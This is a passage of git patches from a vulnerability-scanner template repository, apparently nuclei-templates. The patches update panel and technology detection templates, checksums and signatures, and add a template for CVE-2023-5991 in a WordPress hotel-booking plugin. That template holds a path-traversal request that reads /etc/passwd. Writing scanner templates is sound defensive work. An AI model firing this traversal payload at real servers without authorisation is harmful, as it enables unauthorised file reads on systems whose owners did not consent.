(\"-595620639\" == mmh3(base64_py(body)))" condition: or +# digest: 4a0a004730450221009cfe5c81bde3f5c9462974f80c97205e62b24f03aab1a1893ca852fc0b0b49a802201c6f8e2531a0dc3974eb9f8b284db5527b43eaa7041e2eddbe10753137f5931f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 221c4349db..83b7338994 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f1f276ce2fb2420838d2f811e2b64dc4f881f87e145e1f5eaf9a6c5526bdc1fe022100c06c702de4ff917e3a3dc700b377ff3054243af2c89c6e2bcd36c447560b85e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 07a8a636e91d8f807740fdb1bcba2f781e73a69c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 14:12:25 +0530 Subject: [PATCH 250/375] updated matchers --- http/exposed-panels/umami-panel.yaml | 13 +++---------- 1 file changed, 3 insertions(+), 10 deletions(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index a7426f180e..d21f41ac23 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -11,7 +11,7 @@ info: - https://umami.is/docs metadata: verified: true - max-request: 1 + max-request: 3 shodan-query: http.favicon.hash:-130447705 tags: panel,umami,login,detect @@ -24,19 +24,12 @@ http: - "{{BaseURL}}/favicon.ico" stop-at-first-match: true - matchers-condition: or matchers: - - type: word - part: body - words: - - 'Login | umami' - - 'umami</div>' - condition: or - case-insensitive: true - - type: dsl dsl: + - 'status_code==200 && contains_any(tolower(body), "Login | umami", "umami</div>", "umami</h1>", "<title>umami - login")' - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" + condition: or - method: GET path: From 6994291df2203676109cec0b6196f7f52480987b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 08:49:48 +0000 Subject: [PATCH 252/375] Auto Generated Templates Checksum [Tue May 14 08:49:48 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3189f9ca22..28cb230b03 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3840,7 +3840,7 @@ http/exposed-panels/genweb-plus-panel.yaml:722cb54cc9efc1b84972c6d80c994282efb8f http/exposed-panels/geoserver-login-panel.yaml:c62e462b728c52ae197f5b0446ae908f3401a935 http/exposed-panels/gerapy-detect.yaml:724d1afda108c6a2912bcc793046063e26909b86 http/exposed-panels/gespage-panel.yaml:57eee82ad1606862ed17208b8ff03a7cdba0cb16 -http/exposed-panels/ghost-panel.yaml:de0612cb4c27c9c6fc25fc78e71a5f7ece5dc141 +http/exposed-panels/ghost-panel.yaml:b756b79a07012086b84e1b3b5e946128e34f85f5 http/exposed-panels/gira-homeserver-homepage.yaml:c88f54ceb96676698f89520661b9594f644d6fc2 http/exposed-panels/git-repository-browser.yaml:5b9b836099213deb45e0d441e5cb66224cf5c8a5 http/exposed-panels/gitblit-panel.yaml:8b14a008bde650f9f125c4b930c2908aa6b95334 @@ -3954,7 +3954,7 @@ http/exposed-panels/jeedom-panel.yaml:3fb84bbcfa09ce6964cb2dce502f417498bf82b4 http/exposed-panels/jellyseerr-login-panel.yaml:51a7c1b5d8b5e3f8169bbc8abd9941821477fc41 http/exposed-panels/jenkins-api-panel.yaml:0ba41d9daabab4714bcf58808cfc661c9e9310f2 http/exposed-panels/jenkins-login.yaml:89b0f8e296398a825248bd82947ca61fce3c2a7c -http/exposed-panels/jfrog-login.yaml:c9a40806e3a7ffa48d47ce407b6efa9a563faf56 +http/exposed-panels/jfrog-login.yaml:11757e8cca9629ff2a9ab002a2dedcf867f7692b http/exposed-panels/joget/joget-panel.yaml:a7dfc3fd4921ef9b756bc772a6ce004594f1c29f http/exposed-panels/joomla-panel.yaml:c3ea62950f42c467e19f7a5e7760cd69dfd28bd3 http/exposed-panels/jorani-panel.yaml:7dc1efc38bc8c6be36cec66f40d930500c085baf @@ -4210,7 +4210,7 @@ http/exposed-panels/plastic-scm-login.yaml:fe6d092c51727b09cb9451654271bd3e5e674 http/exposed-panels/plausible-panel.yaml:618d3a4a135c8e80ca35582a0620bcb2d300c63f http/exposed-panels/plesk-obsidian-login.yaml:7f424a234fc5e054a1186ed9fdf7fa84780e66a6 http/exposed-panels/plesk-onyx-login.yaml:f423044e8413a51421c210b0f4f49445efb4606c -http/exposed-panels/pocketbase-panel.yaml:25abff181c32afb59827557e42ba90e44daf471b +http/exposed-panels/pocketbase-panel.yaml:fb5f9369e3ec6a95be6cf0dec0f2fc70639e8176 http/exposed-panels/polycom-admin-detect.yaml:09ff65e682061de9f992c4c4539615e0a62fdc4c http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01 http/exposed-panels/portainer-panel.yaml:e3b502c10ccb719774f551f98c8676d5b60c0403 @@ -4451,7 +4451,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:325957c13e47f3abedc47f8001c40b08d5626486 +http/exposed-panels/umami-panel.yaml:abbff75cd5e6eeea2639f30d43b63c15a8744e0d http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -8524,7 +8524,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6862472e7fcdfc3c1e6dd93385379527dad55a95 +templates-checksum.txt:df9bdb0857ee15b509156fc0299c135a3575e6c1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From eab4c958d0e0e095e57e6f8006ee5a609c5d11ac Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 08:51:36 +0000 Subject: [PATCH 253/375] Auto Template Signing [Tue May 14 08:51:36 UTC 2024] :robot: --- http/exposed-panels/umami-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index d21f41ac23..9317446dd8 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -40,3 +40,4 @@ http: part: body regex: - 'v(?P<version>\d+\.\d+\.\d+)' +# digest: 490a00463044022057cb7369c95c71f95c75ff52799af65aadbe03982e0a51870dc0b8912897932402201c21a65921c649934e56e808ee0076cc892841ec816ad72cbcb49549e3995a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9bc1142faa25de6244ae51f00ae173869555460f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 14:23:37 +0530 Subject: [PATCH 254/375] Update softether-vpn-default-login.yaml --- .../default-logins/softether/softether-vpn-default-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/default-logins/softether/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml index d40d1f073d..269d701ef4 100644 --- a/http/default-logins/softether/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server metadata: - shodan-query: title:"SoftEther VPN Server" verified: true max-request: 1 - tags: panel,vpn,softether,default-login + shodan-query: title:"SoftEther VPN Server" + tags: misconfig,vpn,softether,default-login http: - raw: From 0b215762bff48a505b9922c56a8f63ff9598a6a8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 14 May 2024 09:00:08 +0000 Subject: [PATCH 255/375] Auto Generated New Template Addition List [Tue May 14 09:00:08 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4b8d4ddbaa..fc4f5ccf95 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2024/CVE-2024-0200.yaml +http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/easyvista-panel.yaml From 9c026ef366000ab43e1069724a9302324d05dc6d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 09:00:17 +0000 Subject: [PATCH 256/375] Auto Generated Templates Checksum [Tue May 14 09:00:17 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 28cb230b03..c997b91d4e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3444,6 +3444,7 @@ http/default-logins/seeyon/seeyon-monitor-default-login.yaml:f4a51f27c4e839502e7 http/default-logins/sequoiadb/sequoiadb-default-login.yaml:dabe65c9eef1e73cc13c91f81ef91b44503583c4 http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3422db16dfab647a http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2 +http/default-logins/softether/softether-vpn-default-login.yaml:8d8bbab4f5ccde8a9f50536a71030cb17ac49d89 http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5 http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1 @@ -4451,7 +4452,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:abbff75cd5e6eeea2639f30d43b63c15a8744e0d +http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -8524,7 +8525,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:df9bdb0857ee15b509156fc0299c135a3575e6c1 +templates-checksum.txt:6cb64eac5b580ac207d5ea00b16ab0ae45dfe7ed wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f7b48eb444ed206c2f492c7add5999841bb024a8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 14 May 2024 09:00:47 +0000 Subject: [PATCH 257/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 20013269d7..b5b40de222 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/easyvista-panel.yaml' From e33550b6de3cef0806f3dc7d3caa3e3112485620 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 09:01:57 +0000 Subject: [PATCH 258/375] Auto Template Signing [Tue May 14 09:01:57 UTC 2024] :robot: --- http/default-logins/softether/softether-vpn-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/softether/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml index 269d701ef4..42fde94b7c 100644 --- a/http/default-logins/softether/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cdf72ae99a99fb8f1ad517935e81ce02c7bf9c25 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 15:03:54 +0530 Subject: [PATCH 259/375] Update and rename boa-webserver.yaml to boa-web-server.yaml --- .../boa-web-server.yaml} | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) rename http/{exposed-panels/boa-webserver.yaml => technologies/boa-web-server.yaml} (62%) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/technologies/boa-web-server.yaml similarity index 62% rename from http/exposed-panels/boa-webserver.yaml rename to http/technologies/boa-web-server.yaml index 814f0a8c45..ecde83d378 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/technologies/boa-web-server.yaml @@ -1,16 +1,21 @@ -id: boa-webserver +id: boa-web-server info: - name: Boa Web Server- Detect + name: Boa Web Server - Detect author: johnk3r severity: info - description: Boa is a single-tasking HTTP server. That means that unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. + description: | + Boa is a single-tasking HTTP server. That means that unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. reference: - https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/ - http://www.boa.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + metadata: + shodan-query: "Server: Boa/" + verified: true + max-request: 1 tags: boa,tech http: @@ -23,7 +28,7 @@ http: - type: regex part: header regex: - - "Boa/" + - "Server: Boa/" - type: status status: From 34f0e2623646f71a71435784ffa0203c3e122906 Mon Sep 17 00:00:00 2001 From: idealphase <mynameisphase@gmail.com> Date: Tue, 14 May 2024 16:53:46 +0700 Subject: [PATCH 260/375] Update cacti-panel.yaml Added shodan-query and fofa-query for primary Shodan and fofa user or nuclei option -uncover-engine --- http/exposed-panels/cacti-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index c619f5efa4..5c2f80c2fc 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -2,7 +2,7 @@ id: cacti-panel info: name: Cacti Login Panel - Detect - author: geeknik,daffainfo + author: geeknik,daffainfo,idealphase severity: info description: Cacti login panel was detected. reference: @@ -15,6 +15,8 @@ info: max-request: 2 product: cacti vendor: cacti + shodan-query: http.favicon.hash:-1797138069 + fofa-query: icon_hash="-1797138069" tags: tech,cacti,login,panel http: @@ -49,4 +51,4 @@ http: group: 1 regex: - "<div class='versionInfo'>Version (.*) |" -# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950 From a03b376447358339cbe37cd06ee13b878dcbd474 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 15:32:19 +0530 Subject: [PATCH 261/375] minor update --- http/exposed-panels/cacti-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 5c2f80c2fc..f15f6bb24b 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -2,7 +2,7 @@ id: cacti-panel info: name: Cacti Login Panel - Detect - author: geeknik,daffainfo,idealphase + author: geeknik,daffainfo severity: info description: Cacti login panel was detected. reference: From acc44135cb1ca0f6621b9b930c72b67565f237a8 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Tue, 14 May 2024 13:34:23 +0300 Subject: [PATCH 262/375] add cve 2023 5991 --- http/cves/2023/CVE-2023-5991.yaml | 39 +++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2023/CVE-2023-5991.yaml diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml new file mode 100644 index 0000000000..4aa0a0d2eb --- /dev/null +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-5991 + +info: + name: Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion + author: Kazgangap + severity: critical + description: | + The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 + - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-5991 + cwe-id: CWE-22 + epss-score: 0.00603 + epss-percentile: 0.78406 + cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:* + metadata: + vendor: motopress + product: hotel_booking_lite + framework: wordpress + tags: wpscan,pathtraversal,cve2023,wp-plugin + +http: + - method: GET + path: + - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 \ No newline at end of file From 0118f01e9696d99dbe7a14b63d784ffca3a804dc Mon Sep 17 00:00:00 2001 From: Mohammad D <mohammadamindehghani@pm.me> Date: Tue, 14 May 2024 14:12:19 +0330 Subject: [PATCH 263/375] Add n8n & umami favicon-detect.yaml --- http/technologies/favicon-detect.yaml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index e3d9398fd9..3e821e1d56 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3741,6 +3741,16 @@ http: dsl: - "status_code==200 && (\"702863115\" == mmh3(base64_py(body)))" + - type: dsl + name: "n8n" + dsl: + - "status_code==200 && (\"-831756631\" == mmh3(base64_py(body)))" + + - type: dsl + name: "umami" + dsl: + - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: From 4df9af89b452170e0dff49522c74b888b716454e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 16:24:36 +0530 Subject: [PATCH 264/375] lint fix --- http/cves/2023/CVE-2023-5991.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 4aa0a0d2eb..88a964407e 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -1,7 +1,7 @@ id: CVE-2023-5991 info: - name: Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion + name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion author: Kazgangap severity: critical description: | @@ -21,12 +21,12 @@ info: vendor: motopress product: hotel_booking_lite framework: wordpress - tags: wpscan,pathtraversal,cve2023,wp-plugin + tags: cve,cve2023,lfi,hbl,hotel http: - method: GET - path: - - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download" + path: + - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download" matchers-condition: and matchers: @@ -36,4 +36,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From 4e57e7ef6d1b363f2dcde588517dec43c11775e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 14 May 2024 16:46:34 +0530 Subject: [PATCH 265/375] Create wordpress.yml --- profiles/wordpress.yml | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 profiles/wordpress.yml diff --git a/profiles/wordpress.yml b/profiles/wordpress.yml new file mode 100644 index 0000000000..393836cb68 --- /dev/null +++ b/profiles/wordpress.yml @@ -0,0 +1,9 @@ +# This is a configuration file for the wordpress template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'profiles' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a profiles profile: +# nuclei -config profiles/wordpress.yml -list target_list_to_scan.txt + +tags: + - wordpress From 29787657684e1b6b9fbd728d7b2d4e39c76f002e Mon Sep 17 00:00:00 2001 From: Mohammad D <mohammadamindehghani@pm.me> Date: Tue, 14 May 2024 14:52:09 +0330 Subject: [PATCH 266/375] Add tiny-rss-panel.yaml --- http/exposed-panels/tiny-rss-panel.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/exposed-panels/tiny-rss-panel.yaml diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml new file mode 100644 index 0000000000..de289c8bb0 --- /dev/null +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -0,0 +1,29 @@ +id: tiny-rss-panel + +info: + name: Tiny RSS Panel - Detect + author: userdehghani + severity: info + description: | + Tiny Tiny RSS is a free RSS feed reader + reference: + - https://tt-rss.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-418614327 + tags: panel,tiny-rss,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code==200 && contains(tolower(body), "Tiny Tiny RSS")' + - 'status_code==200 && contains(tolower(body), "ttrss_login")' + - 'status_code==200 && contains(tolower(body), "ttrss_utility")' + + From 6b3cdcc7cb9d6f8ccf5a0cf1faaf9a2c3cb89a03 Mon Sep 17 00:00:00 2001 From: Mohammad D <m.a.dehghani609@gmail.com> Date: Tue, 14 May 2024 14:57:42 +0330 Subject: [PATCH 267/375] Update tiny-rss-panel.yaml --- http/exposed-panels/tiny-rss-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index de289c8bb0..7d226d6904 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -25,5 +25,4 @@ http: - 'status_code==200 && contains(tolower(body), "Tiny Tiny RSS")' - 'status_code==200 && contains(tolower(body), "ttrss_login")' - 'status_code==200 && contains(tolower(body), "ttrss_utility")' - - + condition: and From 74afd0e22e6684a55e0a846936b2a266b81435b7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 12:21:34 +0000 Subject: [PATCH 269/375] Auto Generated Templates Checksum [Tue May 14 12:21:34 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c997b91d4e..9511a8a3df 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3444,7 +3444,7 @@ http/default-logins/seeyon/seeyon-monitor-default-login.yaml:f4a51f27c4e839502e7 http/default-logins/sequoiadb/sequoiadb-default-login.yaml:dabe65c9eef1e73cc13c91f81ef91b44503583c4 http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3422db16dfab647a http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2 -http/default-logins/softether/softether-vpn-default-login.yaml:8d8bbab4f5ccde8a9f50536a71030cb17ac49d89 +http/default-logins/softether/softether-vpn-default-login.yaml:592f93a18fc9a97f31d8a29780dcb874e255d244 http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5 http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1 @@ -6704,7 +6704,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:662ac183c7b67cb50f3b43e94fd9455b9ed79838 +http/technologies/favicon-detect.yaml:7af0d4305d97f9d1f8869a72e244d64936f8ab86 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8496,6 +8496,7 @@ profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8 profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2 +profiles/wordpress.yml:6f7a53edce77971ee3db3990eefbe92e23d7f8f8 ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91 ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521 @@ -8525,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6cb64eac5b580ac207d5ea00b16ab0ae45dfe7ed +templates-checksum.txt:542b55550827998f7eb58bd6f32a8987dfe28dc1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6105cef88222e16015d4f1923c7eb117020f45df Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 12:23:40 +0000 Subject: [PATCH 270/375] Auto Template Signing [Tue May 14 12:23:40 UTC 2024] :robot: --- http/technologies/favicon-detect.yaml | 2 +- 1 file changed, 